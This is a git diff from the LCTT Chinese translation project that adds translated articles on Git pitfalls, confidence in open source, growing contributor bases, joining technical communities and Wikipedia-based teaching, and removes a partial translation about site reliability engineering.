的确让你可以做一些额外的强大的事。在这次谈论中,强大是愚蠢的委婉说法”。在使用 Git 时,谁没有至少经历一个时刻让你感觉像个傻子?当然,Git 是很棒的,每个人都在使用它,你可以用几个基本命令完成你的大部分工作。但它也有强大的力量,让我们觉得我们不知道我们在做什么。 + +但这真的对我们自己不公平。没有人知道一切,每个人知道的都不同。Quinn 提醒我们:“在我许多谈话的 QA 时,人们有时举手说:“嗯,我有一个傻问题。” 你看到人们在那里说:“是啊!这是一个非常愚蠢的问题”。但是当他们得到答案时,这些人正在大量记笔记。 + +![Git](https://www.linux.com/sites/lcom/files/styles/floated_images/public/heffalump-git-corey-quinn_0.png?itok=xh5JlnLW "Git") + +[有权限使用][1] + +Quinn 开始了一些有趣的演示,你可以用 Git 做一些可怕的事情,例如 rebase master 然后进行强制推送搞乱整个项目、输入错误命令并收到 git 提示、提交大型二进制文件等。然后他演示了如何使这些可怕的事情不怎么可怕,如更加明智地管理大型二进制文件。“你可以提交大的二进制文件,你可以在 Git 中提交大文件,如果你需要存储大的二进制文件,这里有两个工具会真的加快加载,一个是 git-annex,这是由 Debian 开发人员 Joey Hess 开发的,而 git-lfs 是由 GitHub 支持的。 + +你有连续输入错误么?例如,当你想要 “git status” 时却输入 “git stitis”?Quinn 有一个方案:“Git 确实对别名有内置支持,所以你可以使用相对较长、复杂的东西,并把它命名为一个短的 Git 命令。” 你还可以使用 shell 别名。 + +Quinn 说:“我们都听说过 rebase master 然后强制推送,这样一个给你所有同事的搞笑恶作剧,它会改变历史,所以突然之前发生的事情并不是人们真正在做的事,而且其他人都被卷入了这个过程。。一群鲸鱼被称为“pod”,一群乌鸦中被称为“谋杀”,一群开发者被称为“合并冲突”。。。更严重的是,如果有人这样做,你有几个选择。包括从备份中恢复 master,还原提交,或者把责任人从屋顶扔下去。或者,采取一定的预防措施并使用一个并不知名的 Git 功能称为分支保护。启用分支保护后,无法删除或强制推送分支,并且在接受前,请求必须至少有一个审核。” + +Quinn 演示了几个更奇妙的有用工具,使 Git 更高效和万无一失,如 mr、vcsh和定制的 shell 提示。你可以在下面看到完整的视频,并享受更多的傻笑话。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/event/LinuxCon-Europe/2016/terrible-ideas-git-0 + +作者:[CARLA SCHRODER][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/linux-foundation +[3]:https://www.linux.com/files/images/heffalump-git-corey-quinnpng-0 +[4]:https://www.linux.com/files/images/corey-quinn-lcnapng +[5]:http://events.linuxfoundation.org/events/linuxcon-north-america diff --git a/translated/talk/20170118 How to gain confidence to participate in open source.md b/translated/talk/20170118 How to gain confidence to participate in open source.md new file mode 100644 index 0000000000..507cf0872c --- /dev/null +++ b/translated/talk/20170118 How to gain confidence to participate in open source.md @@ -0,0 +1,85 @@ +如何从参与开源项目的过程中获取自信 +=============== + ![如何从参与开源项目的过程中获取自信](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/open_community_lead.jpg?itok=anXgpnwG "How to gain confidence to participate in open source") + +图片来源:[Gabriel Kamener, Sown Together][1] 原创,经 Jen Wike Huger 修改。 + +随着大脑的发育,你渐渐学会了这世上什么事情可以/应该做,以及什么事情不能/不应该做。你所有的行为都受到周围大众的影响,很多时候,阻碍你参与某事的原因就是你缺乏自信。 + +纵观我们的生活,我们都或多或少的受到了世俗和社会行为的“教条”影响。我们可能从小就被这样教育:演说家说的都是真理、CEO 都是有远见的、警察维护社会秩序,尊重别人代表着静听让人把话说完,如果人家说错了,你要看场合轻柔的指出来 —— 好吧,这有点复杂。 + +当你决心参与到开源项目之中去的时候,自信将扮演重要角色。开源社区有其固有的参与性。参与就相当于开源世界的流通货币,持有该货币的量取决于你的自信。你的参与性越高、技能越高、分享你的想法和简洁次数越多,你就越能通过自己的提交 (commit) 来改善某一个项目。所有这些都需要你有很强的信念 —— 你有值得分享的事情 —— 并且你会常常思考自己要做什么、分享什么。 + +这里不得不说说这样一个事实:我们每一个人都一些值得分享的事情。但是你要找出这个值得分享的事情是什么,以及在哪个位置分享它才能把这个分享推向最积极、最有意义的一面。 + +认真思考一下三点,这将增强你的自信,并能让你在开源社区中更好的取得进步。 + +### 没有人会站在你的角度来看待你 + +你要时刻谨记着:你是完全独立的个人,他人对你做出的评论就像是不存在一样,只有这样才能更好的获得自信。 + +我们都习惯了这样理解,周围的人都是根据我们的行为来做出评判的。这一习惯相当于学习如何更像社会群体一样生活的副产品。而且很可能在我们的童年,父母根据我们的行为设置的奖励机制时,这个习惯就根植我们心底。到了青春期,老师们对我们的表现来评价,给我们划分等级和分数,拿我们和身边的小伙伴对比。这样的动力和奖励机制给我们的大脑建立了一个包括自我反思在内的反馈回路。我们需要预测自己能否得到回报,并要为那些可能发生的事情做好应对。 + +现今的我们都有这样第一个疑惑:身边的人是如何看到我的?可能因此,真相是多数人都不会花太多时间来对你进行正确客观的评价。我们所有人只是关注自己的回报,我们有自己热衷于某件事的的热情、有大量急待解决的问题。也有一些人忙于关心他们自己如何影响身边的人,他们并不会在身上花费时间。他们根本不会注意到你是否出错、大声谈话还是向他们的背景乐一样。所有的那些疑惑都只是在你自己的脑海中而已,而非在其他任何人脑中。 + +我们需要为人们所接受的愿望也是人生意义的一部分,但是这类接受我们所遇之人的一时兴起。这些人可能对我们缺乏全面认识,比如我们叫什么、我们来自哪里、形成我们认知的经历,等等。我们能否为人们所接受是一件不受我们自身控制的事情。但是,我们是可以通过与之交流来改变的。 + +在开源的高密度社区的世界里,记住这一点是非常重要的:人们是不会过多的考虑你的。因为你的同事和导师都在忙于其他项目或则社区成员。 + +一旦你认知了这一点,通过积极地沟通来热情拥抱这个世界吧。寻求帮助、告知他人你的需求、指出你的贡献、让人们知道你和他们在一起努力、你也是这个社区中的活跃分子。当人们向你靠拢 ——而非相反 —— 时,你的开源可信度和自信会得到极大的提高。 + +### 所有人都热衷于分享自己熟知的事情 + +任何成功的开源社区都是一个包含教和学的社区。为沐浴在开源中,你不仅需要用到自身的已有知识,还需要不断的吸收消化其他人提供课程中的知识。幸运的是,人们都普遍热衷于分享他们熟悉的事情。 + +思考一下,当他人问及你的观点时,你是什么感受。得知他人认可了你所说的观点,对你的 ID 和个人精神是多么美好的一件事。 + +在儿童期时,我们的大脑并没有那么发达,无法为我们容纳现实世界中大量的信息量。我们曾一度认为自己是世界的中心。在六岁以前,我们的认知一直在不断成长。在此期间,我们的额父母会因我们哭泣而做出回应,周围的成年人都会满足我们要求。这会在我们心底形成自己在世界上最重要的证据。 + +我们的神经回路在此期间建立完成,我们的性格也在此期间形成。随着我们学会参与社会和城市的生活,我们逐渐的认识到自己并非世界的中心。然而,最初形成并深植我们心底那种意识并不会因此马上就消除掉。正确理解我们在整个社会氛围中的个人意识将有助于你与他人建立连接并融洽相处。 + +在团结协作中慢慢积累学习经验可以很好的磨练自己、发展自己社会关系和提高自身技能。想要进军开源的世界,不断地学习是不可或缺的。 + +那么,这些和自信有些什么关系呢?通过表明你重视他人的知识和付出,你提高的不仅是他们的自信,还有你自己的自信。那时你将会感到更加灵活。有些时候,你不得不承认自己也有不懂的地方。 + +自信自认也许会说“是的,我不知道”,但却不会因此而沮丧。 + +### 一分耕耘,一分收获 (You reap what you sow) + +你一定听过“不懂装懂,永远是饭桶”。这样说吧,自信就像其他很多的心理现象。 +积极地提示自己:我很聪明、有趣、引人关注、极富天赋、健谈、是一个很好的伙伴、独一无二、知识面广、学习能力强、常常自省的思想者,或者是其他你想要具备的特质,久而久之你就会觉得自己就是这样的人。并且,如果这可以在你身上生效,在其他人身上也一样。。 + +我们把这个称为自我肯定。 + +此外,在开源的世界中,你是如何为人考虑、如何待人,那么反过来,他人也会是这样的。如果你想在开源贡献中获得成功,你就要有足够的自信来相信自己坚持的立场和事物,当然了,你要以一种可以让人接受的方式来表现,同时还要包容其他的意见和观点。领导者的标志就是,在生活中塑造他们想要看到的形象,而不管是否有他人模仿。 + +那么,你是否有其他增强自信的方法呢?记得在评论区告诉我们哦。 + +---------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/profilepicsq_0.jpg?itok=CVMJs36A) + +Laura Hilliger - 艺术家、教育事业者、作家、技术专家。她是一个多媒体设计师和开发者、技术联络员、项目经理、一个开放且喜欢协作环境的网络黑客。她主张变革,目前为发展壮大绿色和平组织二辛勤工作。Alum @Mozilla,UC Berkeley,BAVC, Adobe。Twitter @epilepticrabbit 。 + +---------------------------------- + +译者简介: + +![GHLandy](http://GHLandy.com/images/GHLandy.ico) + +[GHLandy](http://GHLandy.com) —— 欲得之,则为之奋斗 (If you want it, work for it.)。 + +----------------------------------- + +via: https://opensource.com/article/17/1/3-ways-improve-your-confidence + +作者:[Laura Hilliger][a] +译者:[GHlandy](https://github.com/GHlandy) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/laurahilliger +[1]:https://www.flickr.com/photos/42647587@N06/ diff --git a/translated/talk/20170120 5 ways to expand your projects contributor base.md b/translated/talk/20170120 5 ways to expand your projects contributor base.md new file mode 100644 index 0000000000..269223ab5a --- /dev/null +++ b/translated/talk/20170120 5 ways to expand your projects contributor base.md @@ -0,0 +1,75 @@ +5 个提升你项目贡献者基数的方法 +============================================================ + ![5 ways to expand your project's contributor base](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_cubestalk.png?itok=MxdS-jA_ "5 ways to expand your project's contributor base") + +图片提供  + +opensource.com + +许多自由和开源软件项目开始解决一个问题时,就有人们开始为它们贡献,因为他们也想修复他们遇到的问题。当项目的最终用户发现它对他们的需求有用,项目就开始增长。这种共同的目的和焦点吸引人们到同一个项目社区。 + +像任何事物都是有寿命的,增长即是标志也是项目成功的来源。那么项目领导者和维护者如何鼓励贡献者基数的增长?这里有五种方法。 + +### 1. 提供好的文档 + +人们经常低估项目[文档][2]的重要性。它是项目贡献者的主要信息来源,它会激励他们努力。信息必须是正确和最新的。它应该包括如何构建软件、如何提交补丁、编码风格指南等步骤。 + +查看经验丰富的科技作家、编辑 Bob Reselman 的[ 7 个创建世界级文档的规则][3]。 + +开发人员文档的一个很好的例子是[ Python 开发人员指南][4]。它包括清晰简洁的步骤,涵盖 Python 开发的各个方面。 + +### 2. 降低进入门槛 + +如果你的项目有[问题或 bug 追踪][5]工具,请确保将初级任务标记为一个“容易 bug ”或“起点”。新的贡献者可以很容易地通过解决这些问题进入项目。追踪器也是标记非编程任务(如平面设计、图稿和文档改进)的地方。有许多项目成员不是每天都编码,但是却通过这种方式成为推动力。 + +Fedora 项目维护一个这样的[易修复和入门级问题的追踪][6]工具。 + +### 3. 为补丁提供常规反馈 + +即使它是一行,也要确认每个补丁,并给作者反馈。提供反馈有助于吸引潜在的候选人,并指导他们熟悉项目。所有项目都应有一个邮件列表和[聊天功能][7]进行通信。问答可在这些媒介中发生。大多数项目不会在一夜之间成功,但那些繁荣的列表和沟通渠道为增长创造了环境。 + +### 4. 推广你的项目 + +开始解决问题的项目实际上可能对其他开发人员也有用。作为项目的主要贡献者,你的责任是写下你的的项目并推广它。写博客文章,并在社交媒体上分享项目的进展。你可以简要描述如何以项目的贡献者来开始,并在该描述中提供主要开发者文档的参考连接。此外,请务必提供有关路线图和未来版本的信息。 + +为了你的听众,获取由 Opensource.com 的社区经理 Rikki Endsley 写的[写作提示][8]。 + +### 5. 保持友好 + +友好的对话语调和迅速的回复将加强人们对你的项目的兴趣。最初,问题只是为了寻求帮助,但在未来,新的贡献者也可能会提出想法或建议。让他们有信心他们可以成为项目的贡献者。 + +记住你一直在被评估!人们会观察任何项目开发者如何在邮件列表或聊天上的交谈。这些意味着对新贡献者的欢迎和开放。当使用技术时,我们有时会忘记人们,但这对于任何项目的生态系统都很重要。考虑一个情况,项目是很好的,但项目维护者不是很受欢迎。该管理员可能会驱使用户远离项目。对于有大量用户基数的项目而言,不被支持的环境可能导致分裂,一部分用户可能决定复刻项目并启动新项目。在开源世界中有这样的成功例子。 + +另外,拥有背景不同的人对于开源项目的持续增长和源源不断的电子是很重要的。 + +最后,项目主人有责任维持和帮助项目成长。指导新的贡献者是项目的关键,他们将成为项目和社区未来的领导者。 + +阅读:由红帽的内容战略家 Nicole Engard 写的_[ 7 种方式让新的贡献者感到受欢迎][1] _。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ar1dbnui.jpg?itok=4Xa7f2cM) + +Kushal Das - Kushal Das 是 Python 软件基金会的一名 CPython 核心开发人员和主管。他是一名长期的 FOSS 贡献者和导师,他帮助新人进入贡献世界。他目前在 Red Hat 担任 Fedora 云工程师。他的博客在 https://kushaldas.in。你也可以在 Twitter @kushaldas 上找到他 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/expand-project-contributor-base + +作者:[Kushal Das][a] +译者:[geekpi](https://github.com/geekpi) +校对:[Bestony](https://github.com/bestony) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/kushaldas +[1]:https://opensource.com/life/16/5/sumana-harihareswara-maria-naggaga-oscon +[2]:https://opensource.com/tags/documentation +[3]:https://opensource.com/business/16/1/scale-14x-interview-bob-reselman +[4]:https://docs.python.org/devguide/ +[5]:https://opensource.com/tags/bugs-and-issues +[6]:https://fedoraproject.org/easyfix/ +[7]:https://opensource.com/alternatives/slack +[8]:https://opensource.com/business/15/10/what-stephen-king-can-teach-tech-writers diff --git a/translated/talk/20170126 How to join a technical community.md b/translated/talk/20170126 How to join a technical community.md new file mode 100644 index 0000000000..06d8c15c28 --- /dev/null +++ b/translated/talk/20170126 How to join a technical community.md @@ -0,0 +1,72 @@ +如何加入技术社区 +============================================================ + +### 参照以下几步可以让你很容易地融入社区 + + ![How to join a technical community](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_DebucketizeOrgChart_A.png?itok=oBdRm8vc "How to join a technical community") +图片提供: opensource.com + +加入一个新的社区在很多情况下可能是一个艰巨的任务。当加入一个新的技术社区时,焦虑感可能特别强烈,尤其是一些社区对新成员的严厉甚至讥讽。 + +虽然有可能陷入一个不公正的地方,但是我认为你会发现大多数技术社区是相当合理的,并且以下几个简单的步骤可以缓解从非成员到成员的过渡。 + +### 相互适合 + +该过程开始于实际加入社区前。第一步是确保社区适合你,同时你也是社区的一个补充。 + +这听起来很简单,但每个社区都有不同的文化、态度、理念和公认的规范。如果你是某话题的新成员,面向行业专业人士的社区不是一个理想的起点。同样,如果你是一个寻找深入并且极其复杂问题的答案的专家,一个初学者的社区肯定也不太合适。无论哪种方式,两边的不匹配几乎肯定会导致双方的失望。同样,一些社区将是非常正规并且面向商业的,而另一些社区将非常宽松和悠闲,同时许多社区氛围在二者之间。选择适合你的社区,或最低限度不是你厌恶的社区,将有助于确保你的长期参与。 + +### 浏览社区 + +最初以浏览和只读模式参与社区是一个好方法。这并不意味着你不应该立即创建一个帐户或加入,只是你需要通过浏览社区得到一个空间(虚拟的或物理的)感觉。潜伏一段时间会帮助你适应社区的规则和文化,以此确定你是否认为这是一个很适合你的平台。 + +### 介绍自己 + +根据社区的不同,自我介绍的细节将有很大的不同。同样,确保这样做的方式容易被社区接受。 + +有些社区可能有一个专门的介绍板块,而在另一些社区,它可能意味着填写你的个人资料等有意义和相关的信息。如果社区是邮件列表或 IRC 频道,你的初始疑问中包含简要介绍可能更有意义。这将让社区了解你是谁,为什么你想成为社区的一部分,并让他们知道一点关于你自己和你的技术水平的信息。 + +### 保持尊重 + +虽然社区间的接受方式有很大的不同,但你应该永远保持尊重。避免争吵和人身攻击,并始终努力建设社区。记住,你在互联网上发布的东西,它永远存在,并为大家所看到。 + +### 问题 + +### 提问 + +记住,精心设计的问题可以更快地得到更好的答案,正如我在十月专栏[The Queue][2]中指出的。 + +### 回答 + +一旦遇见了自己很了解的关于基础或非常容易回答的提问时,“尊重”的理念也同样适用,就像提问时一样。一个技术上的冗长并充满优越感的正确答案,并不是介绍自己到一个新的社区的正确方式。 + +### 其他讨论 + +即使在技术社区,并不是所有的讨论都是关于某个问题或答案。在这种情况下,以尊重和周到的、不带有侮辱和人身攻击的方式,提出不同的意见、挑战他人的观点是健康正确的做法。 + +### 享受自己 + +长期参加社区最重要的事情是在那里享受自己。参与一个充满活力的社区是一个学习,成长,挑战和提升自我的好机会。很多情况下,这并不容易,但它是值得的。 + +-------------------------------------------------------------------------------- + +作者简介: + +Jeremy Garcia - Jeremy Garcia 是 LinuxQuestions.org 的创始人,同时也是一个热情和注重实际的开源拥护者。个人推特: @linuxquestions + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/how-join-technical-community + +作者:[Jeremy Garcia][a] +译者:[livc](https://github.com/livc) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jeremy-garcia +[1]:https://opensource.com/article/17/1/how-join-technical-community?rate=SfjMzwYInmhZiq6Yva3D87kngE-ocLOVraCD0wWbBss +[2]:https://opensource.com/life/16/10/how-ask-technical-questions +[3]:https://opensource.com/user/86816/feed +[4]:https://opensource.com/article/17/1/how-join-technical-community#comments +[5]:https://opensource.com/users/jeremy-garcia diff --git a/translated/talk/20170205 Can academic faculty members teach with wikipedia.md b/translated/talk/20170205 Can academic faculty members teach with wikipedia.md new file mode 100644 index 0000000000..5434ea027d --- /dev/null +++ b/translated/talk/20170205 Can academic faculty members teach with wikipedia.md @@ -0,0 +1,60 @@ +#教职人员是否可以运用维基百科教学? + +[![Can academic faculty members teach with Wikipedia?](https://camo.githubusercontent.com/47dfe3fec215387fa7bb1f2c038f4e78e0e2e47d/68747470733a2f2f6f70656e736f757263652e636f6d2f73697465732f64656661756c742f66696c65732f7374796c65732f696d6167652d66756c6c2d73697a652f7075626c69632f696d616765732f656475636174696f6e2f4544555f61636164656d6963735f353230783239325f6d612e706e673f69746f6b3d397846574f637436)](https://camo.githubusercontent.com/47dfe3fec215387fa7bb1f2c038f4e78e0e2e47d/68747470733a2f2f6f70656e736f757263652e636f6d2f73697465732f64656661756c742f66696c65732f7374796c65732f696d6167652d66756c6c2d73697a652f7075626c69632f696d616765732f656475636174696f6e2f4544555f61636164656d6963735f353230783239325f6d612e706e673f69746f6b3d397846574f637436) +图片来自 : opensource.com + +自从2010年,已经有29000 个学生完成了 Wiki Ed 这一项目。他们在维基百科上添加了 25 百万的词条,等同于 85000 页纸张的内容。这还是 Britannica 百科全书中所有词条的 66%。Wiki Ed 的学生们最积极的时候,他们正贡献着维基百科上那 10% 且尚未发展的学术板块。 + +为了了解更多关于这个项目的信息,我联络了 LiAnna Davis -- Wiki Ed项目的负责人。他极富热情地同意来回答我的问题。 + +贴士:[Wiki Education Foundation (Wiki Ed)](https://wikiedu.org/) 的平台是用免费软件搭建的,链接为: [WikiEdu Dashboard GitHub](https://github.com/WikiEducationFoundation/WikiEduDashboard). + + +**Wiki Ed 这一项目是如何启动的?说说你的背景以及你是如何参与进这个项目的。** + +在2010年,[Wikimedia Foundation](https://wikimediafoundation.org/wiki/Home)(简称WMF,运营维基百科的非营利组织)注意到了一个趋势 -- 大学的教职人员如果本身也是维基词条的编辑者,他们已经成功地将编辑维基词条作为一项任务交给了自己课堂里的学生。WMF 就此开展了一个试行项目试图回答这个问题:如果本身不编辑维基词条的教职人员支持课程中包含维基词条的编辑任务,他们是否可以通过维基百科实现教学呢? + +我是这个团队的一员,在2010年被试行雇用,我对这个问题的回答是:“可以。” 在 2013年,WMF将这个项目的美国分部和加拿大分部拆分,形成了一个新的非营利性组织 -- the Wiki Education Foundation (Wiki Ed);自此我也从 WMF 到了Wiki Ed。自那以后我们便成为了一个独立组织,我们可以专注于这个项目并且将这个项目拓展开来 -- 起初 WMF 时期每年只有75个班级参与,而这个学期以及有275班级参与了 Wiki Ed。 + +**人们总是默认大学生对科技相关的一切事物都很敏感,尤其是互联网,但是你们的网站上写道,“大学本科学生可能具有高科技敏感度,但这并不代表他们具有高科技成熟度。” 你可以稍微解释一下这句话吗?** + +仅仅因为一个人可以搞明白自己的 iPhone 如何使用不代表他们可以明辨他们在网上阅读的信息是否值得信赖。 [斯坦福的一项研究](https://sheg.stanford.edu/upload/V3LessonPlans/Executive%20Summary%2011.21.16.pdf) ("Evaluating Information: The Cornerstone of Civic Online Reasoning November 22, 2016.")在近期表明:学生们并不具有高科技成熟度。然而,当学生们在撰写维基百科文章之时,他们必须这样。他们需要严格遵守维基百科的[可信来源](https://en.wikipedia.org/wiki/Wikipedia:Identifying_reliable_sources) 规范,这些规范明确了维基百科上的任何信息都必须注明来源,这些来源必须是独立的,而且是可以追溯的事实。对于很多学生,这样注明来源还是第一次,多数人之前仅仅是通过谷歌搜索话题或者注明他们亲眼所见的第一手资料来进行资料的检索和查证。他们需要理解哪些资料可靠,哪些资料不可靠,从而成为足够成熟的电子信息消费者。 + +**你想对那些声称“维基百科不是一个可靠的来源”的人说些什么?** + +维基百科是一本百科全书,根据在词典中的定义,它是一个第三手资料。当学生们开始读本科的时候,他们应该学会参考一手和二手资料,而不是第三手资料,因此学生不应该,且不能引用维基百科的内容。但是维基百科在研究之初会是一个不错的选择,它可以给你对这个话题一个广泛的认识,并且帮你发现页面底部那些你可以参考的文章来源。就像我们所鼓励的:“不要引用!用你的语言写!” + +> 这样做可以让学生们代入知识生产者的身份,而不是知识的消耗者... + +**一个教授在Wiki Ed项目中的参与是如何影响到他的学生的呢?** + +通过运用维基百科教学,导师们可以给学生们提供媒体素养,批判性思维,线上交流以及写作能力,不论他们在毕业之后会继续选择科研或是加入工作大军,这些极富价值的品质和技能都能帮助他们成功。这样做可以让学生们代入知识生产者的身份,而不是知识的消耗者,而且这可以给予他们一个真正在这个世界做出改变的机会,而不是学生们到了学期末便会抛之脑后的生硬习题。 + +我们正在积极鼓励新的班级在春季学期加入这个项目。感兴趣的教职人员可以点击 [the Wikipedia Education Foundation's Teach page](https://teach.wikiedu.org/) 由此开始。 + +**一个教师会需要哪些职业素养来参与这个项目?学生又是需要哪些训练呢?** + +当你在 [the Wikipedia Education Foundation's Teach page](http://teach.wikiedu.org/)上注册的时候,你会发现Wiki Ed为新加入的教职人员提供了如何运用维基百科实现教学的在线指南。我们还有为学生提供的一系列的在线训练,根据他们不同的任务自动分配不同的指南(例如,如果你希望你的学生在文章中插入图片,他们会得到一个如何插入编辑图片的教学单元,如果你不需要,他们便不会得到这个单元的指南)。在部分十几个学科中,我们还有特定的指南书展示了这几个学科的特定编辑方式。除此之外,我们还有熟练维基百科编辑的工作人员帮助回答学生和导师们的问题。我们的系统已经在逐步扩大;我们在这个秋季学期已经支持了超过 6300 个学生,并且已经适应了与没有维基编辑经验的教职人员合作,因此这样就保证了没有人会因为资历不够而不参与。 + +**”访问学者“这个项目是指?** + + +我们正在试着建立学术界和维基百科之间的联系,而鼓励运用维基百科教学的项目只是其中的一环。在“访问学者”这一项目中,大学图书馆或者教学部门将公开他们的资料,并提供给一个缺乏资料的认证维基百科编辑人员(被称作是“访问学者”)。通过大学这一渠道,“访问学者”们可以有机会使用这些资源来完善维基百科广泛领域中的文章。这是一个规模相对小却伟大的项目,因为我们花了很多时间来建立这样的联系,但是这些“学者”们都产出了许多真的很精彩的内容。 + +**你的合作伙伴有谁?他们的参与如何影响到你现在的成功呢,或者在未来将会如何呢?** + +我们与那些将我们工作的价值看做对他们的学科的一种服务的学术机构合作。让我们面对这个现实:当人们想要获取关于一个话题的知识之时,他们不会去读那些同僚评审过,并在这些机构发表的学术论文,他们会去维基百科。通过鼓励这些机构中的教职人员用维基百科教学,正可以完善维基百科的在这些学科中的内容和信息。我们的合作伙伴扩充了我们的潜在成员,并且让我们以合作身份大量完善了维基百科上特定学科的内容。 + +我们欢迎读者点击这个页面 [Support Us page](http://wikiedu.org/donate) 通过捐赠来支持我们的工作 + +*** + +作者简介: + +Don Watkins 是一个教育家,专注教育技术,创业家,开源提倡者。教育心理学硕士,教育领导力硕士,Linux系统管理员,思科认证网络支持工程师, 通过 Virtual Box 和 VMware 虚拟化。关注他: @Don_Watkins . + +via: https://opensource.com/article/17/1/Wiki-Education-Foundation + +作者:Don Watkins 译者:scoutydren 校对:校对者ID + +本文由 LCTT 原创编译,Linux中国 荣誉推出 diff --git a/translated/tech/20160425 What is SRE.md b/translated/tech/20160425 What is SRE.md deleted file mode 100644 index 2663122a8d..0000000000 --- a/translated/tech/20160425 What is SRE.md +++ /dev/null @@ -1,84 +0,0 @@ -什么是SRE(网站可靠性工程)? -============================================================ - -网站可靠性工程师是近来越来越多看到的一个职位。它是什么意思?它来自哪里?让我们从 Google SRE 团队来学习。 - - ![Bridge](https://d3tdunqjn7n0wj.cloudfront.net/360x240/bridge-1031545-1400-389c9609ff7c64083c93db48dc77eeff.jpg) - -这里有一篇由 Niall Richard Murphy、Jennifer Petoff、Chris Jones、Betsy Beyer 编辑一篇来自[网站可靠性工程][9]的摘录。 - -网站可靠性工程也在[11月7-10日在阿姆斯特丹举办的 O'Reilly Velocity 会议][10]上有提到。 - -### 介绍 - -> 希望不是一种策略。 -> -> 传统的 SRE 说 - -一个公认的事实是系统不会自己。 那么,一个特定系统的复杂大规模系统_应该_怎么运行呢? - - -### sysadmin 服务管理方法 - -sysadmin服务管理模型有几个优点。对于决定该如何运行和服务的公司而言,这种方法相对容易实现:它作为一个熟悉的行业范例,有很多例子可以从中学习和效仿。相关人才库已经广泛普及。有一系列现有的工具,软件组件(现成的或其他)和集成公司可用于帮助运行这些组装的系统,所以新手sysadmin团队不必重新发明轮子以及从头设计系统。 - -因此,传统运营团队及其在产品开发中的同行往往会发生冲突,最突出的是如何将软件发布到生产环境。在他们核心中,开发团队希望推出新功能,并看到它们被用户采纳。在_他们_的核心上,ops 团队希望确保服务在运行中不会中断。因为大多数中断是由某种变化引起的 - 新的配置、新的功能发布或者新的用户流量类型 - 这两个团队的目标基本上处于紧张状态。 - -两个团队都明白,以最可能的条款(“我们可以没有阻碍地在任何时间发布任何东西”以及“我们不想在系统工作后改变任何东西”)来表达他们的利益是不可接受的。因为他们的词汇和风险假设都不同,两个团体经常采用熟悉斗争形式来提高他们的利益。 ops 团队试图通过发布介绍和提高门槛来保护运行中的系统免受更改的风险。例如,发布审查可能包含对_每个_问题的显式审查,这些问题过去都_曾经_引起过服务中断 - 它可能是一个任意长度的列表,并且不是所有元素都提供相等的值。开发团队很快学会了如何回应。他们有较少的“发布”和更多的“标志翻转”、“增量更新”或“cherrypicks”。他们采取诸如分割产品功能的策略,以便更少的功能受到发布审查。 - - -### Google 服务管理的方法:网站可靠性工程 - -冲突不是提供软件服务的必然部分。Google 选择以不同的方式运行我们的系统:我们的网站可靠性工程团队专注于雇佣软件工程师来运行我们的产品,并创建系统来完成那些本来由sysadmins手动完成的工作。 - -什么是网站可靠性工程,是如它在谷歌定义的那样么?我的解释很简单:SRE 是当你要求一位软件工程师设计一个运维团队时会发生的那样。当我在2003年加入 Google 并负责运行一个由 7 名工程师组成的“生产团队”时,那时我工作的全部都是软件工程。所以我设计和管理了一个假如我是一名 SRE ,_我_想要的团队的样子。这个团队已经成为了 Google 的目前的 SRE 团队,它仍然是一名终生软件工程师所想象的那个样子。 - -Google 服务管理方法的主要构成部分是由每个 SRE 团队的组成。作为一个整体,SRE可以分为两大类。 - -50-60% 的人是 Google 软件工程师,或者更确切地说,是通过 Google 软件工程师的标准程序招聘的人。其他 40-50% 的候选人非常接近 Google 软件工程师资格(即所需技能集的 85-99%),以及一些具有大多数软件工程师没有的一些 SRE 技术技能的人。到目前为止,UNIX 系统内部和网络(第1层到第3层)的专业知识是我们寻求的两种最常见的替代技术技能。 - -所有 SRE 的共同点是对开发软件系统以解决复杂问题的信念和能力。在 SRE 中,我们密切跟踪两个团队的职业发展,并且迄今为止发现在两种工程师之间的表现没有实际差异。事实上,SRE 团队的多样背景经常产生聪明、高质量的系统,这显然是几个技能集合成的产物。 - -我们这样招聘 SRE 的结果是,我们有了这样一个团队:(a)手动执行任务很快会变得无聊。(b)他们有必要的技能集来写出软件以取代以前的手动操作,即使解决方案很复杂。SRE 还会与其他开发部门分享学术以及知识背景。因此,SRE 从根本上做了一个运维团队历来做的工作,但它使用具有软件专业知识的工程师,并期望这些内在倾向于用软件,并且有能力用软件的人用软件设计并实现自动化来代替人力劳动。 - -按照设计,至关重要的是 SRE 团队专注于工程。没有恒定的工程,运维工作增加,团队将需要更多的人来上工作量。最终,传统的以 ops 为中心的团队与服务规模呈线性关系:如果服务支持的产品成功,运维工作将随着流量而增长。这意味着雇用更多的人一遍又一遍地完成相同的任务。 - -为了避免这种命运,负责管理服务的团队需要写代码否则就会被工作淹没。因此,Google _设置了一个 “ops” 工作如 ticket、紧急呼叫、手动任务最多只占 50% SRE 工作的上限_。此上限确保SRE团队在其计划中有足够的时间使服务稳定及可操作。50% 是上限;随着时间的推移,除了自己的设备,SRE 团队应该只有很少的运维工作,他们几乎可以完全从事开发任务,因为服务基本上可以运行和维修自己:我们想要的系统是_自动的_,而不只是_自动化_。在实践中,规模和新功能始终 SRE 要考虑的 - -Google的经验法则是,SRE团队必须花费剩余的 50% 的时间来进行实际开发。那么我们该如何执行这个阈值呢?首先,我们必须测量 SRE 